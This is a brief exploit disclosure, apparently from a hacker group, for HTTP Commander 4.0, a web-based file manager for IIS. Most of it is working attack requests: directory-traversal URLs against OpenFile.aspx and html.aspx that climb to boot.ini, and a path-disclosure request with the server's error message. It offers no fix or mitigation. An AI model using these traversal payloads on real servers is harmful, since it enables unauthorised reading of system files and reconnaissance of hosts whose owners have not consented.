Bugs in HTTP Commander 4.0.

HTTP Commander is a web-based file manager for Microsoft IIS web servers.

Example Directory Traversal:
http://www.victim.com/NetDemo2/OpenFile.aspx?file=../../../../../../../../boot.ini

http://www.victim.com/NetDemo2/html.aspx?file=../../../../../../../../../boot.ini

Example Path Disclosure:
http://www.victim.com/NetDemo2/html.aspx?file=.
you will read the message:
Access to the path "C:\WEBHOSTING4LIFE ASPNET\SERGANT\GUEST" is denied.

Zero X, member of www.lobnan.de and www.lostkey.org